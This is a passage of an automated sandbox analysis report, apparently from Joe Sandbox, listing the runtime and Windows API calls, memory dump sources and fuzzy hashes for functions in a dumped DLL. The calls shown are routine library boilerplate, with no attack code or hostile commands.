                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Item
                                        • String ID:
                                        • API String ID: 369458955-0
                                        • Opcode ID: d7f00d556e7ad391f5f350a842663398958efae64b7cdc57cb86a842710ccf10
                                        • Instruction ID: 50b55b5917b2bf16cf74e4f1bb83d9cdc38a8b41d37b8d61c969f72da777e61c
                                        • Opcode Fuzzy Hash: d7f00d556e7ad391f5f350a842663398958efae64b7cdc57cb86a842710ccf10
                                        • Instruction Fuzzy Hash: 0201D831005616678B121F218F04E8F3F26EF413A5B21A13DFF1455210DB31F5128791
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(6FED34A8), ref: 6FEAC25A
                                        • RtlInitializeCriticalSection.NTDLL(?), ref: 6FEAC26C
                                        • RtlLeaveCriticalSection.NTDLL(6FED34A8), ref: 6FEAC279
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 6FEAC289
                                          • Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
                                          • Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                        • String ID:
                                        • API String ID: 2895727460-0
                                        • Opcode ID: 0c7d83b7f6ab7ef0073d08effec790d04f6ae9b3fa0913432f59f0e1dd96e834
                                        • Instruction ID: 460a1ac6e8e2cf6bcf7057c7203bd02e50dd87c5cc23cc3b16279e5d6591f3a0
                                        • Opcode Fuzzy Hash: 0c7d83b7f6ab7ef0073d08effec790d04f6ae9b3fa0913432f59f0e1dd96e834
                                        • Instruction Fuzzy Hash: F4F06872604514AFDB005B9C9D467057F69EBD3769F310026F1548A641CB35D591C571
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(6FED32EC), ref: 6FEABA69
                                        • TlsGetValue.KERNEL32(6FED32D0,?,?,?,?,6FEAC0B7,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABA7D
                                        • RtlLeaveCriticalSection.NTDLL(6FED32EC), ref: 6FEABA93
                                        • RtlLeaveCriticalSection.NTDLL(6FED32EC), ref: 6FEABA9E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterValue
                                        • String ID:
                                        • API String ID: 3969253408-0
                                        • Opcode ID: 1cb8a4ef7ff9b2a504c899bcc2c6c904df5ec4309f7fb661a538891207a6f76b
                                        • Instruction ID: 296d7d7999d00155a3489ef99770ab3f8e55cc02d15428f580157a16603feb2c
                                        • Opcode Fuzzy Hash: 1cb8a4ef7ff9b2a504c899bcc2c6c904df5ec4309f7fb661a538891207a6f76b
                                        • Instruction Fuzzy Hash: 73F0B4362046089FD7208F18C888C0A7FEDEF86770325446AF65987200E632F861CBA0
                                        APIs
                                        • __getptd.LIBCMT ref: 6FEC0586
                                          • Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
                                          • Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F
                                        • __getptd.LIBCMT ref: 6FEC059D
                                        • __amsg_exit.LIBCMT ref: 6FEC05AB
                                        • __lock.LIBCMT ref: 6FEC05BB
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                        • String ID:
                                        • API String ID: 3521780317-0
                                        • Opcode ID: f9283b80a586401edd1516f74cfdd4fbd837bdf06aef0e7154c435eb8070b201
                                        • Instruction ID: a510313e3e498dc3af6186ca2d13bc9b45995185c50fc0001201cebd998633c5
                                        • Opcode Fuzzy Hash: f9283b80a586401edd1516f74cfdd4fbd837bdf06aef0e7154c435eb8070b201
                                        • Instruction Fuzzy Hash: 2AF062B29407108FDB209B68870175C3EA05F01728F70151DEA60A72E0CB34A901CB52
                                        APIs
                                          • Part of subcall function 6FEAA59C: GetModuleHandleW.KERNEL32(KERNEL32,6FEAA6B6), ref: 6FEAA5AA
                                          • Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FEAA5CB
                                          • Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FEAA5DD
                                          • Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FEAA5EF
                                          • Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FEAA601
                                        • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FEAA6D0
                                        • SetLastError.KERNEL32(0000006F), ref: 6FEAA6E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$Module$ErrorFileHandleLastName
                                        • String ID:
                                        • API String ID: 2524245154-3916222277
                                        • Opcode ID: ae966f0bb6752cd3d2a077e98667edbfd24e39823bb81bdbcc8902dddb832a90
                                        • Instruction ID: 5635ba2154c572a5ba431e64510cd17ebca2ae9729ed61fdf3ae3873b8085086
                                        • Opcode Fuzzy Hash: ae966f0bb6752cd3d2a077e98667edbfd24e39823bb81bdbcc8902dddb832a90
                                        • Instruction Fuzzy Hash: CB216A70841318DEDB20DF70C8487DABBB8BF49728F20869ED069DA280DB756A85CF50
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FEA8E78
                                        • PathFindExtensionW.SHLWAPI(?), ref: 6FEA8E8E
                                          • Part of subcall function 6FEA8BDF: __EH_prolog3_GS.LIBCMT ref: 6FEA8BE9
                                          • Part of subcall function 6FEA8BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FEA8EB7,?,?), ref: 6FEA8C19
                                          • Part of subcall function 6FEA8BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FEA8C2D
                                          • Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C69
                                          • Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C77
                                          • Part of subcall function 6FEA8BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FEA8C94
                                          • Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8CBF
                                          • Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FEA8CC8
                                          • Part of subcall function 6FEA8BDF: GetModuleFileNameW.KERNEL32(6FEA0000,?,00000105), ref: 6FEA8D7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                        • String ID: %s%s.dll
                                        • API String ID: 1311856149-1649984862
                                        • Opcode ID: 22cc29e7f1f69461bacbaf26c40fe9fdc82ccb6438f2981ef394da0947f4a0ca
                                        • Instruction ID: 03f8926c9c3474b81a0c97daa52d9f347f0c65062125f0c66afc5a274e219727
                                        • Opcode Fuzzy Hash: 22cc29e7f1f69461bacbaf26c40fe9fdc82ccb6438f2981ef394da0947f4a0ca
                                        • Instruction Fuzzy Hash: A201A771905518EBCB05CBA8DD899EFBBF9AF4A314F1104AAA505DB140D6719B04CB50
                                        APIs
                                          • Part of subcall function 6FEB5017: __getptd.LIBCMT ref: 6FEB501D
                                          • Part of subcall function 6FEB5017: __getptd.LIBCMT ref: 6FEB502D
                                        • __getptd.LIBCMT ref: 6FEBC54B
                                          • Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
                                          • Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F
                                        • __getptd.LIBCMT ref: 6FEBC559
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: csm
                                        • API String ID: 803148776-1018135373
                                        • Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                        • Instruction ID: f1b12ce22d135680e44c6aa82d4144e3e347f5e866a36f455a5ea4bd5ab64f60
                                        • Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                        • Instruction Fuzzy Hash: 6B016D75A0E3059BCF248F68D6407AEBFB5AF10219F70442FD950AA790DB31AA84DF51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: Po$xPo
                                        • API String ID: 431132790-3544800484
                                        • Opcode ID: 5cc9a10b35760f9d6539c9117f69bed7cab30e4a088f3424562a4ea2fe3e094f
                                        • Instruction ID: 5c73ef9a8f2a02994b14fcd55b299a0932d7ae6fe6068136af4403fdd55f38d1
                                        • Opcode Fuzzy Hash: 5cc9a10b35760f9d6539c9117f69bed7cab30e4a088f3424562a4ea2fe3e094f
                                        • Instruction Fuzzy Hash: 76F08172902311CFDF249B68CB857AD7FA1AF0431AF315A5FE2A54B6E0C775B840C682
                                        APIs
                                        • _memset.LIBCMT ref: 6FEA7318
                                        • PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6FEA7540,00000000,?), ref: 6FEA732D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: PathRootStrip_memset
                                        • String ID: @uo
                                        • API String ID: 2213896960-1137737743
                                        • Opcode ID: 3a9169efaff85f09b7c8b1987590648c425de4b2ca4be8dfebd8d23059ca3a19
                                        • Instruction ID: 9edb4f563a386f2d43e1c253626b8c50ff365ec412eefe2a20bd0c93b46ed081
                                        • Opcode Fuzzy Hash: 3a9169efaff85f09b7c8b1987590648c425de4b2ca4be8dfebd8d23059ca3a19
                                        • Instruction Fuzzy Hash: 5EE0DF3B10522437C6016A9D8C48EEF3F6D8FD7774F208229FA385B2D1DB35A91186B2